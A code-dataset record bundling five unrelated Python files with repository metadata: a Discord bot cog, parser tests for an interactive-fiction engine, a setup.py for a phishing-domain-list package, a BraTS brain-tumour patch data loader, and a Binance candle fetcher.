Yureehh/Perfecto---O---Tron
|
cfd6f1819a9e4b7a9a406061bb7fadfea4084a86
|
[
"MIT"
] | null | null | null |
cogs/start.py
|
Yureehh/Perfecto---O---Tron
|
cfd6f1819a9e4b7a9a406061bb7fadfea4084a86
|
[
"MIT"
] | 1
|
2020-09-16T16:27:52.000Z
|
2020-09-16T16:27:52.000Z
|
cogs/start.py
|
Yureehh/Perfecto---O---Tron
|
cfd6f1819a9e4b7a9a406061bb7fadfea4084a86
|
[
"MIT"
] | null | null | null |
import discord
from discord.ext import commands,tasks
from datetime import datetime
import asyncio
from itertools import cycle
#number of minutes used at timer for loops
MINUTES_TO_WAIT = 30
#in the brackets there's the class you are extending
class Start(commands.Cog):
def __init__(self, bot, messages=0, joined=0):
self.bot = bot
self.messages = messages
self.joined = joined
#Status the bot will cicle. All of them are memes of course
self.status = cycle(["League of Lol", "with your mind", "with your fate", "with your secrets", "Fortine is for kids", "CS:GO is old", "Valoraahahahahnt","with your emotions"])
async def update_stats(self):
while not self.bot.is_closed():
try:
now = datetime.now()
current_time = now.strftime("%D %H:%M:%S")
with open("stats.txt", "a+") as f:
f.write(f"Time: {current_time}, Messages: {self.messages}, Members Joined: {self.joined}\n")
self.messages = 0
self.joined = 0
await asyncio.sleep(MINUTES_TO_WAIT * 60)
except Exception as e:
print(e)
await asyncio.sleep(MINUTES_TO_WAIT * 60)
@commands.Cog.listener()
async def on_ready(self):
await self.bot.change_presence(status=discord.Status.online )
self.changeStatus.start()
self.bot.loop.create_task(self.update_stats())
print("Bot launched")
@tasks.loop(seconds = MINUTES_TO_WAIT * 60)
async def changeStatus(self):
await self.bot.change_presence(activity = discord.Game(next(self.status)))
@commands.Cog.listener()
async def on_message(self, message):
self.messages += 1
#await self.bot.process_commands(message)
@commands.Cog.listener()
async def on_member_join(self, member):
self.joined += 1
for channel in member.guild.channels:
if str(channel) == "welcome":
await channel.send(f"Welcome to the server {member.mention}", file = discord.File("images/welcome.jpg"))
@commands.Cog.listener()
async def on_member_remove(self, member):
message = f"Bye bye {member.mention}, looking forward to your return"
for channel in member.guild.channels:
if str(channel) == "welcome" or str(channel) == "goodbyes":
await channel.send(f"{member.mention} left the server", file = discord.File("images/missYou.jpg"))
#happens when someone tries to rename himself
@commands.Cog.listener()
async def on_member_update(self, before, after):
n = after.nick
if n:
if "Yureeh" in n.lower():
await after.edit(nick = "Don't you dare")
def setup(bot):
bot.add_cog(Start(bot))
| 36.269231
| 183
| 0.625309
| 374
| 2,829
| 4.649733
| 0.395722
| 0.028177
| 0.054629
| 0.069005
| 0.222542
| 0.222542
| 0.154687
| 0.057504
| 0.057504
| 0.057504
| 0
| 0.006715
| 0.26299
| 2,829
| 78
| 184
| 36.269231
| 0.827338
| 0.082715
| 0
| 0.157895
| 0
| 0.017544
| 0.170205
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035088
| false
| 0
| 0.087719
| 0
| 0.140351
| 0.035088
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb6cc5ff9b1a00d13872972359a28898848fa4c7
| 14,716
|
py
|
Python
|
tests/test_parser.py
|
RathmoreChaos/intficpy
|
a5076bba93208dc18dcbf2e4ad720af9e2127eda
|
[
"MIT"
] | 25
|
2019-04-30T23:51:44.000Z
|
2022-03-23T02:02:54.000Z
|
tests/test_parser.py
|
RathmoreChaos/intficpy
|
a5076bba93208dc18dcbf2e4ad720af9e2127eda
|
[
"MIT"
] | 4
|
2019-07-09T03:43:35.000Z
|
2022-01-10T23:41:46.000Z
|
tests/test_parser.py
|
RathmoreChaos/intficpy
|
a5076bba93208dc18dcbf2e4ad720af9e2127eda
|
[
"MIT"
] | 5
|
2021-04-24T03:54:39.000Z
|
2022-01-06T20:59:03.000Z
|
from .helpers import IFPTestCase
from intficpy.ifp_game import IFPGame
from intficpy.thing_base import Thing
from intficpy.things import Surface, UnderSpace
from intficpy.actor import Actor, SpecialTopic
from intficpy.verb import (
IndirectObjectVerb,
GetVerb,
LookVerb,
SetOnVerb,
LeadDirVerb,
JumpOverVerb,
GiveVerb,
ExamineVerb,
GetAllVerb,
)
from intficpy.exceptions import ObjectMatchError
class TestParser(IFPTestCase):
def test_verb_with_no_objects(self):
self.game.turnMain("look")
self.assertIs(self.game.parser.command.verb, LookVerb)
self.assertIsNone(self.game.parser.command.dobj.target)
self.assertIsNone(self.game.parser.command.iobj.target)
def test_verb_with_dobj_only(self):
dobj = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(dobj)
self.game.turnMain(f"get {dobj.name}")
self.assertIs(self.game.parser.command.verb, GetVerb)
self.assertIs(self.game.parser.command.dobj.target, dobj)
self.assertIsNone(self.game.parser.command.iobj.target)
def test_gets_correct_verb_with_dobj_and_direction_iobj(self):
dobj = Actor(self.game, self._get_unique_noun())
self.start_room.addThing(dobj)
iobj = "east"
self.start_room.east = self.start_room
self.game.turnMain(f"lead {dobj.name} {iobj}")
self.assertIs(self.game.parser.command.verb, LeadDirVerb)
self.assertIs(self.game.parser.command.dobj.target, dobj)
self.assertEqual(self.game.parser.command.iobj.target, iobj)
def test_gets_correct_verb_with_preposition_dobj_only(self):
dobj = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(dobj)
self.game.turnMain(f"jump over {dobj.name}")
self.assertIs(self.game.parser.command.verb, JumpOverVerb)
self.assertIs(self.game.parser.command.dobj.target, dobj)
self.assertIsNone(self.game.parser.command.iobj.target)
def test_gets_correct_verb_with_preposition_dobj_and_iobj(self):
dobj = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(dobj)
iobj = Surface(self.game, self._get_unique_noun())
self.start_room.addThing(iobj)
self.game.turnMain(f"set {dobj.name} on {iobj.name}")
self.assertIs(self.game.parser.command.verb, SetOnVerb)
self.assertIs(self.game.parser.command.dobj.target, dobj)
self.assertIs(self.game.parser.command.iobj.target, iobj)
class TestGetGrammarObj(IFPTestCase):
def test_gets_correct_objects_with_adjacent_dobj_iobj(self):
dobj_item = Actor(self.game, self._get_unique_noun())
self.start_room.addThing(dobj_item)
iobj_item = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(iobj_item)
self.game.turnMain(f"give {dobj_item.name} {iobj_item.name}")
self.assertEqual(self.game.parser.command.dobj.target, dobj_item)
self.assertEqual(self.game.parser.command.iobj.target, iobj_item)
class TestAdjacentStrObj(IFPTestCase):
class StrangeVerb(IndirectObjectVerb):
word = "strange"
syntax = [["strange", "<iobj>", "<dobj>"]]
hasStrIobj = True
iscope = "text"
dscope = "near"
def strangeVerbFunc(game, dobj, iobj):
game.addTextToEvent("turn", "You do strange things")
return True
def test_thing_follows_string_adjacent_string_object(self):
thing = Thing(self.game, "thing")
thing.setAdjectives(["good"])
self.start_room.addThing(thing)
self.game.turnMain("strange purple good thing")
self.assertIs(
self.game.parser.command.verb,
self.StrangeVerb,
"Unexpected verb from command with adjacent string objects where thing "
"follows string",
)
self.assertIs(
self.game.parser.command.dobj.target,
thing,
"Unexpected dobj from command with adjacent string objects where thing "
"follows string",
)
class TestGetThing(IFPTestCase):
def test_get_thing(self):
noun = self._get_unique_noun()
self.assertNotIn(
noun,
self.game.nouns,
f"This test needs the value of noun ({noun}) to be such that it does not "
"initially exist in self.game.nouns",
)
item1 = Thing(self.game, noun)
self.start_room.addThing(item1)
self.assertTrue(
noun in self.game.nouns,
"Name was not added to self.game.nouns after Thing creation",
)
self.game.turnMain(f"examine {noun}")
self.assertIs(
self.game.parser.command.dobj.target,
item1,
"Failed to match item from unambiguous noun",
)
item2 = Thing(self.game, noun)
self.start_room.addThing(item2)
self.assertEqual(len(self.game.nouns[noun]), 2)
adj1 = "unique"
adj2 = "special"
self.assertNotEqual(
adj1, adj2, "This test requires that adj1 and adj2 are not equal"
)
item1.setAdjectives([adj1])
item2.setAdjectives([adj2])
self.game.turnMain(f"examine {noun}")
self.assertEqual(self.game.parser.command.dobj.tokens, [noun])
self.game.turnMain(f"examine {adj1} {noun}")
self.assertIs(
self.game.parser.command.dobj.target,
item1,
"Noun adjective array should have been unambiguous, but failed to match "
"Thing",
)
class TestParserError(IFPTestCase):
def test_verb_not_understood(self):
self.game.turnMain("thisverbwillnevereverbedefined")
msg = self.app.print_stack.pop()
expected = "I don't understand the verb:"
self.assertIn(expected, msg, "Unexpected response to unrecognized verb.")
def test_suggestion_not_understood(self):
topic = SpecialTopic(
self.game, "tell sarah to grow a beard", "You tell Sarah to grow a beard."
)
self.game.parser.command.specialTopics["tell sarah to grow a beard"] = topic
self.game.turnMain("thisverbwillnevereverbedefined")
msg = self.app.print_stack.pop()
expected = "is not enough information to match a suggestion"
self.assertIn(expected, msg, "Unexpected response to unrecognized suggestion.")
def test_noun_not_understood(self):
self.game.turnMain("take thisnounwillnevereverbedefined")
msg = self.app.print_stack.pop()
expected = "I don't see any"
self.assertIn(expected, msg, "Unexpected response to unrecognized noun.")
def test_verb_by_objects_unrecognized_noun(self):
self.game.turnMain("lead sarah")
msg = self.app.print_stack.pop()
expected = "I understood as far as"
self.assertIn(
expected,
msg,
"Unexpected response attempting to disambiguate verb with unrecognized "
"noun.",
)
def test_verb_by_objects_no_near_matches_unrecognized_noun(self):
sarah1 = Actor(self.game, "teacher")
sarah1.setAdjectives(["good"])
self.start_room.addThing(sarah1)
sarah2 = Actor(self.game, "teacher")
sarah2.setAdjectives(["bad"])
self.start_room.addThing(sarah2)
self.game.turnMain("hi teacher")
self.assertTrue(self.game.parser.command.ambiguous)
self.game.turnMain("set green sarah")
msg = self.app.print_stack.pop()
expected = "I understood as far as"
self.assertIn(
expected,
msg,
"Unexpected response attempting to disambiguate verb with unrecognized "
"noun.",
)
class TestCompositeObjectRedirection(IFPTestCase):
def test_composite_object_redirection(self):
bench = Surface(self.game, "bench")
self.start_room.addThing(bench)
underbench = UnderSpace(self.game, "space")
bench.addComposite(underbench)
widget = Thing(self.game, "widget")
underbench.addThing(widget)
self.game.turnMain("look under bench")
msg = self.app.print_stack.pop()
self.assertIn(
widget.verbose_name,
msg,
"Unexpected response attempting to use a component redirection",
)
class TestDisambig(IFPTestCase):
def test_disambiguate_with_directional_adjective(self):
east_pillar = Thing(self.game, "pillar")
east_pillar.setAdjectives(["east"])
west_pillar = Thing(self.game, "pillar")
west_pillar.setAdjectives(["west"])
self.start_room.addThing(east_pillar)
self.start_room.addThing(west_pillar)
self.game.turnMain("x pillar")
self.assertTrue(self.game.parser.command.ambiguous)
self.game.turnMain("east")
self.assertIs(
self.game.parser.command.dobj.target,
east_pillar,
"Unexpected direct object after attempting to disambiguate with direction "
"adjective",
)
def test_disambiguate_with_index(self):
east_pillar = Thing(self.game, "pillar")
east_pillar.setAdjectives(["east"])
west_pillar = Thing(self.game, "pillar")
west_pillar.setAdjectives(["west"])
self.start_room.addThing(east_pillar)
self.start_room.addThing(west_pillar)
self.game.turnMain("x pillar")
self.assertTrue(self.game.parser.command.ambiguous)
self.game.turnMain("1")
self.assertIn(
self.game.parser.command.dobj.target,
[east_pillar, west_pillar],
"Unexpected direct object after attempting to disambiguate with index",
)
class TestPrepositions(IFPTestCase):
def test_prepositional_adjectives(self):
up_ladder = Thing(self.game, self._get_unique_noun())
up_ladder.setAdjectives(["high", "up"])
self.start_room.addThing(up_ladder)
self.game.turnMain(f"x up high {up_ladder.name}")
self.assertIs(
self.game.parser.command.verb,
ExamineVerb,
"Unexpected verb after using a preposition as an adjective",
)
self.assertIs(
self.game.parser.command.dobj.target,
up_ladder,
"Unexpected dobj after using a preposition as an adjective",
)
def test_verb_rejected_if_preposition_not_accounted_for(self):
up_ladder = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(up_ladder)
self.game.turnMain(f"x up big {up_ladder.name}")
self.assertIsNot(
self.game.parser.command.verb,
ExamineVerb,
"Examine verb does not have preposition `up`. Should not have matched.",
)
def test_preposition_directional_verb(self):
girl = Thing(self.game, "girl")
self.start_room.addThing(girl)
self.game.turnMain(f"lead girl up")
self.assertIs(
self.game.parser.command.verb,
LeadDirVerb,
"Unexpected verb after using a direction that doubles as a preposition (up) "
"for a directional verb",
)
class TestKeywords(IFPTestCase):
def test_keyword_adjectives(self):
everything_box = Thing(self.game, self._get_unique_noun())
everything_box.setAdjectives(["good", "everything"])
self.start_room.addThing(everything_box)
self.game.turnMain(f"x everything good {everything_box.name}")
self.assertIs(
self.game.parser.command.verb,
ExamineVerb,
"Unexpected verb after using an english keyword as an adjective",
)
self.assertIs(
self.game.parser.command.dobj.target,
everything_box,
"Unexpected dobj after using an english keyword as an adjective",
)
def test_verb_rejected_if_keyword_not_accounted_for(self):
everything_box = Thing(self.game, self._get_unique_noun())
self.start_room.addThing(everything_box)
self.game.turnMain(f"x everything good {everything_box.name}")
self.assertIsNot(
self.game.parser.command.verb,
ExamineVerb,
"Examine verb does not have keyword `everything`. Should not have matched.",
)
def test_verb_with_keyword(self):
self.game.turnMain("take all")
self.assertIs(
self.game.parser.command.verb,
GetAllVerb,
"Tried to call a verb with an english keyword.",
)
class TestSuggestions(IFPTestCase):
def test_accept_suggestion(self):
girl = Actor(self.game, "girl")
TOPIC_SUGGESTION = "ask what her name is"
TOPIC_TEXT = '"It\'s Karen," says the girl.'
topic = SpecialTopic(self.game, TOPIC_SUGGESTION, TOPIC_TEXT)
girl.addSpecialTopic(topic)
self.start_room.addThing(girl)
self.game.turnMain("talk to girl")
self.assertTrue(self.game.parser.command.specialTopics)
self.game.turnMain(TOPIC_SUGGESTION)
msg = self.app.print_stack.pop(-2)
self.assertEqual(
msg, TOPIC_TEXT, "Expected topic text to print after accepting suggestion"
)
class TestReplacement(IFPTestCase):
STRING = "this one here is improbable to find elsewhere"
INTEGER = 77
@classmethod
def class_method_with_one_arg(cls, ret):
return ret
def test_print_replace_with_string(self):
thing = Thing(self.game, self._get_unique_noun())
thing.x_description = "I will <<test_parser.TestReplacement.STRING>> this."
thing.moveTo(self.start_room)
self.game.turnMain(f"x {thing.name}")
msg = self.app.print_stack.pop()
self.assertIn(self.STRING, msg)
def test_print_replace_with_integer(self):
thing = Thing(self.game, self._get_unique_noun())
thing.x_description = "I will <<test_parser.TestReplacement.INTEGER>> this."
thing.moveTo(self.start_room)
self.game.turnMain(f"x {thing.name}")
msg = self.app.print_stack.pop()
self.assertIn(str(self.INTEGER), msg)
def test_attempting_to_replace_with_function_call_raises(self):
thing = Thing(self.game, self._get_unique_noun())
thing.x_description = (
"I will <<test_parser.TestReplacement.class_method_with_one_arg(7)>> this."
)
thing.moveTo(self.start_room)
with self.assertRaises(NotImplementedError):
self.game.turnMain(f"x {thing.name}")
| 32.414097
| 89
| 0.647323
| 1,733
| 14,716
| 5.345066
| 0.151183
| 0.08982
| 0.055921
| 0.083882
| 0.608118
| 0.576055
| 0.5346
| 0.488934
| 0.403865
| 0.370614
| 0
| 0.002631
| 0.251019
| 14,716
| 453
| 90
| 32.485651
| 0.837779
| 0
| 0
| 0.354167
| 0
| 0
| 0.189861
| 0.018279
| 0
| 0
| 0
| 0
| 0.14881
| 1
| 0.083333
| false
| 0
| 0.020833
| 0.002976
| 0.151786
| 0.035714
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb6e51b991925d3f2d075e10b6faa76829b92e27
| 965
|
py
|
Python
|
setup.py
|
KAJdev/pydisfish
|
aca538cb3e774b4e92469b4f0dd7c8f724088e16
|
[
"MIT"
] | 1
|
2021-11-04T18:38:43.000Z
|
2021-11-04T18:38:43.000Z
|
setup.py
|
KAJdev/pydisfish
|
aca538cb3e774b4e92469b4f0dd7c8f724088e16
|
[
"MIT"
] | null | null | null |
setup.py
|
KAJdev/pydisfish
|
aca538cb3e774b4e92469b4f0dd7c8f724088e16
|
[
"MIT"
] | null | null | null |
import setuptools
import re
with open("README.md", "r") as fh:
long_description = fh.read()
version = ''
with open('pydisfish/__init__.py') as f:
version = re.search(r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]', f.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError('version is not set')
requirements = []
with open('requirements.txt') as f:
requirements = f.read().splitlines()
setuptools.setup(
name='pydisfish',
version=version,
author='kajdev',
description="A small module to easily interact with discord's phishing domain list.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/kajdev/pydisfish",
packages=["pydisfish"],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
install_requires=requirements
)
| 28.382353
| 99
| 0.65285
| 112
| 965
| 5.491071
| 0.625
| 0.097561
| 0.061789
| 0.097561
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002564
| 0.19171
| 965
| 33
| 100
| 29.242424
| 0.785897
| 0
| 0
| 0
| 0
| 0
| 0.35544
| 0.043523
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.071429
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb70059c996805e1f7f560d971daa768591ddbce
| 9,173
|
py
|
Python
|
backup/data_bk.py
|
ieee820/BraTS2018-tumor-segmentation
|
22e1a22909a0c21503b5ef5fc6860a1e1131e851
|
[
"MIT"
] | 157
|
2018-09-22T20:45:04.000Z
|
2022-01-24T13:08:09.000Z
|
backup/data_bk.py
|
bonjoura/BraTS2018-tumor-segmentation
|
22e1a22909a0c21503b5ef5fc6860a1e1131e851
|
[
"MIT"
] | null | null | null |
backup/data_bk.py
|
bonjoura/BraTS2018-tumor-segmentation
|
22e1a22909a0c21503b5ef5fc6860a1e1131e851
|
[
"MIT"
] | 53
|
2018-10-09T09:34:15.000Z
|
2021-08-14T10:24:43.000Z
|
import sys
if sys.version_info[0] == 2:
import Queue as queue
else:
import queue
import os
import math
import multiprocessing as mp
import threading
import torch
from torch.utils.data import Dataset
import numpy as np
from data_utils import get_receptive_field, get_sub_patch_shape, \
get_offset, sample_coords, get_all_coords, nib_load
PATCH_SHAPE = (25, 25, 25)
KERNELS = ((3, 3, 3), )*8
SCALE_FACTOR = (3, 3, 3)
SHAPE = [240, 240, 155]
np.random.seed(2017)
mean = [433.78412444, 661.42844749, 588.09469198, 651.22305233]
mean = np.array(mean).reshape(4, 1, 1, 1)
std = [1343.81579289, 1200.61193295, 1178.99769383, 1390.22978543]
std = np.array(std).reshape(4, 1, 1, 1)
class ImageList(Dataset):
def __init__(self,
list_file,
patch_shape=PATCH_SHAPE,
kernels=KERNELS,
scale_factor=SCALE_FACTOR,
root='',
split='valid',
sample_size=20):
names = []
with open(list_file) as f:
for line in f:
line = line.strip()
name = line.split('/')[-1]
path = os.path.join(root, line , name + '_')
names.append(path)
self.root = root
self.names = names
self.split = split
self.sample_size = sample_size
self.receptive_field = get_receptive_field(kernels)
self.patch_shape = np.array(patch_shape)
self.scale_factor = np.array(scale_factor)
self.sub_patch_shape = get_sub_patch_shape(self.patch_shape,
self.receptive_field, self.scale_factor)
self.sub_off = get_offset(self.scale_factor, self.receptive_field)
self.modalities = ('flair', 't1ce', 't1', 't2')
self.C = len(self.modalities)
def coord_to_slice(self, coord):
return coord[:, 0], coord[:, 1] + 1
def coord_to_sub_slice(self, coord):
lo = coord[:, 0] + self.sub_off
num = self.patch_shape - self.receptive_field + 1
hi = lo + self.scale_factor*self.receptive_field + \
np.ceil((num*1.0)/self.scale_factor - 1) * self.scale_factor
hi = hi.astype('int')
lo = lo.astype('int')
m = lo < 0
pl = -lo * m
lo[lo < 0] = 0
m = hi > SHAPE
ph = (hi - SHAPE) * m
hi += pl.astype('int')
pad = list(zip(pl, ph))
return lo, hi, pad
def crop(self, coords, images, label):
N = coords.shape[0]
samples = np.zeros((N, self.C) + tuple(self.patch_shape), dtype='float32')
sub_samples = np.zeros((N, self.C) + tuple(self.sub_patch_shape), dtype='float32')
labels = np.zeros((N,) + (9, 9, 9), dtype='int')
size = (self.sub_patch_shape - 1)//2
gl = (self.patch_shape - size)//2
gh = self.patch_shape - gl
kx, ky, kz = self.scale_factor
for n, coord in enumerate(coords):
ss, ee = self.coord_to_slice(coord)
lo, hi, pad = self.coord_to_sub_slice(coord)
cropped_label = label[ss[0]:ee[0], ss[1]:ee[1], ss[2]:ee[2]]
labels[n] = cropped_label[gl[0]:gh[0], gl[1]:gh[1], gl[2]:gh[2]]
samples[n] = images[:, ss[0]:ee[0], ss[1]:ee[1], ss[2]:ee[2]]
pimages = np.pad(images, [(0, 0)] + pad, mode='constant') \
if np.sum(pad) > 0 else images
sub_samples[n] = \
pimages[:, lo[0]:hi[0]:kx, lo[1]:hi[1]:ky, lo[2]:hi[2]:kz]
samples = samples - mean
samples = samples / std
sub_samples = sub_samples - mean
sub_samples = sub_samples/std
return samples, sub_samples, labels
def __call__(self, index):
return self.__getitem__(index)
def __getitem__(self, index):
path = self.names[index]
start = time.time()
images = np.array([
nib_load(path + modal + '.nii.gz') \
for modal in self.modalities])
t1 = time.time() - start
start = time.time()
mask = images.sum(0) > 0
#images -= mean * mask
#images /= std
label_file = path + 'seg.nii.gz'
label = nib_load(label_file)
exit(0)
n = self.sample_size
if self.split == 'train':
fg = (label > 0).astype('int32')
bg = ((mask > 0) * (fg == 0)).astype('int32')
coords = np.concatenate(
[sample_coords(n/2, self.patch_shape, weight) for weight in (fg, bg)])
elif self.split == 'valid':
coords = sample_coords(n, self.patch_shape, mask)
else: # test
coords = get_all_coords((9, 9, 9), self.patch_shape, SHAPE, 15)
t2 = time.time() - start
start = time.time()
samples, sub_samples, labels = self.crop(coords, images, label)
t3 = time.time() - start
msg = 'read {}, sample {}, crop {}, total {}'.format(t1, t2, t3, t1 + t2 + t3)
print(msg)
#print(t1, t2, t3, t1+t2+t3)
# 2.3 sec total
#exit(0)
return samples, sub_samples, labels, coords
def __len__(self):
return len(self.names)
@staticmethod
def collate(batch):
data = [torch.cat([torch.from_numpy(t) for t in v]) for v in zip(*batch)]
perm = torch.randperm(data[0].shape[0])
return [t[perm] for t in data]
class PEDataLoader(object):
"""
A multiprocess-dataloader that parallels over elements as suppose to
over batches (the torch built-in one)
Input dataset must be callable with index argument: dataset(index)
https://github.com/thuyen/nnet/blob/master/pedataloader.py
"""
def __init__(self, dataset, batch_size=1, shuffle=False,
num_workers=None, pin_memory=False, num_batches=None):
self.dataset = dataset
self.batch_size = batch_size
self.shuffle = shuffle
self.num_workers = num_workers
self.collate_fn = collate
self.pin_memory_fn = \
torch.utils.data.dataloader.pin_memory_batch if pin_memory else \
lambda x: x
self.num_samples = len(dataset)
self.num_batches = num_batches or \
int(math.ceil(self.num_samples / float(self.batch_size)))
self.pool = mp.Pool(num_workers)
self.buffer = queue.Queue(maxsize=1)
self.start()
def generate_batches(self):
if self.shuffle:
indices = torch.LongTensor(self.batch_size)
for b in range(self.num_batches):
indices.random_(0, self.num_samples-1)
batch = self.pool.map(self.dataset, indices)
batch = self.collate_fn(batch)
batch = self.pin_memory_fn(batch)
yield batch
else:
self.indices = torch.LongTensor(range(self.num_samples))
for b in range(self.num_batches):
start_index = b*self.batch_size
end_index = (b+1)*self.batch_size if b < self.num_batches - 1 \
else self.num_samples
indices = self.indices[start_index:end_index]
batch = self.pool.map(self.dataset, indices)
batch = self.collate_fn(batch)
batch = self.pin_memory_fn(batch)
yield batch
def start(self):
def _thread():
for b in self.generate_batches():
self.buffer.put(b, block=True)
self.buffer.put(None)
thread = threading.Thread(target=_thread)
thread.daemon = True
thread.start()
def __next__(self):
batch = self.buffer.get()
if batch is None:
self.start()
raise StopIteration
return batch
next = __next__
def __iter__(self):
return self
def __len__(self):
return self.num_batches
root = '/home/thuyen/Data/brats17/Brats17TrainingData/'
file_list = root + 'file_list.txt'
dset = ImageList(file_list, root=root)
import time
start = time.time()
for i in range(len(dset)):
dset[i]
#x1, x2, y, c = dset[0]
print(time.time() - start)
start = time.time()
exit(0)
from dataloader import DataLoader
import time
from sampler import SSampler
batch_size = 10
num_epochs = 20
num_iters = len(dset) * num_epochs // batch_size
sampler = SSampler(len(dset), num_epochs=num_epochs)
dloader = DataLoader(dset,
batch_size=batch_size, pin_memory=True, collate_fn=ImageList.collate, sampler=sampler,
#batch_size=batch_size, pin_memory=True, shuffle=True,
#num_batches = num_iters,
num_workers=20)
import torch
#a = torch.rand(10).cuda()
start = time.time()
count = 0
for k, x in enumerate(dloader):
if k == 0:
count = 0
start = time.time()
shapes = [t.shape for t in x]
print(k, str(shapes))
y = [t.cuda(non_blocking=True) for t in x]
count += 1
end = time.time()
print((end-start)/(count - 1), count)
#start = time.time()
#for x in dloader:
# end = time.time()
# print(x[0].size(), end-start)
# start = end
#
#exit(0)
# preprocess data to speedup traning and predictions
| 29.782468
| 94
| 0.578764
| 1,245
| 9,173
| 4.105221
| 0.209639
| 0.035218
| 0.024653
| 0.009978
| 0.137351
| 0.121698
| 0.076306
| 0.054392
| 0.043044
| 0.043044
| 0
| 0.038438
| 0.296631
| 9,173
| 307
| 95
| 29.879479
| 0.75372
| 0.066172
| 0
| 0.146119
| 0
| 0
| 0.021946
| 0.005398
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068493
| false
| 0
| 0.073059
| 0.022831
| 0.200913
| 0.018265
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
bb715b8832fba253f15741c5824e20ae8941000e
| 2,364
|
py
|
Python
|
backintime/candles_providers/binance_api_candles/binance_api_candles.py
|
akim-mukhtarov/backtesting
|
2d0491b919885eeddd62c4079c9c7292381cb4f9
|
[
"MIT"
] | null | null | null |
backintime/candles_providers/binance_api_candles/binance_api_candles.py
|
akim-mukhtarov/backtesting
|
2d0491b919885eeddd62c4079c9c7292381cb4f9
|
[
"MIT"
] | null | null | null |
backintime/candles_providers/binance_api_candles/binance_api_candles.py
|
akim-mukhtarov/backtesting
|
2d0491b919885eeddd62c4079c9c7292381cb4f9
|
[
"MIT"
] | null | null | null |
from .utils import to_ms, to_candle
from ..api_candles import ApiCandles
from ...timeframes import Timeframes
import datetime, time
import requests as r
class BinanceApiCandles(ApiCandles):
_url = 'https://api.binance.com/api/v3/klines'
# <Timeframes> : <str - binance str repr>
_binance_intervals = {
Timeframes.M1: '1m',
Timeframes.M3: '3m',
Timeframes.M5: '5m',
Timeframes.M15: '15m',
Timeframes.M30: '30m',
Timeframes.H1: '1h',
Timeframes.H2: '2h',
Timeframes.H4: '4h',
Timeframes.D1: '1d',
Timeframes.W1: '1w'
}
def __init__(self, ticker: str, timeframe_tag: Timeframes):
try:
self._interval = self._binance_intervals[timeframe_tag]
except KeyError:
allowed = list(self._binance_intervals.keys())
raise ValueError(
'Binance API supports the following timeframes: {allowed}')
self._ticker = ticker
self._gen = None
super().__init__(timeframe_tag)
def _candles(self):
# Convert datetime objects to timestamp
since = to_ms(self._start_date.timestamp())
end_time = to_ms(time.time())
MAX_PER_REQUEST = 1000
max_time_step = MAX_PER_REQUEST*self.candle_duration()*1000
params = {
'symbol': self._ticker,
'interval': self._interval,
'startTime': None,
'endTime': end_time,
'limit': MAX_PER_REQUEST
}
for start_time in range(since, end_time, max_time_step):
# this requests 1k candles at a time
params['startTime'] = start_time
res = r.get(self._url, params)
res.raise_for_status()
for obj in res.json():
yield to_candle(obj, self._candle_buffer)
def current_date(self) -> datetime.datetime:
if not self._start_date:
return None
ticks = self.get_ticks()
time_passed = datetime.timedelta(
seconds=ticks*self.candle_duration())
return self._start_date + time_passed
def next(self) -> None:
if not self._gen:
self._gen = iter(self._candles())
next(self._gen)
self._tick_counter.increment()
| 31.945946
| 76
| 0.576565
| 261
| 2,364
| 4.961686
| 0.429119
| 0.021622
| 0.030116
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021237
| 0.322758
| 2,364
| 73
| 77
| 32.383562
| 0.787633
| 0.047377
| 0
| 0
| 0
| 0
| 0.073103
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067797
| false
| 0.033898
| 0.084746
| 0
| 0.237288
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|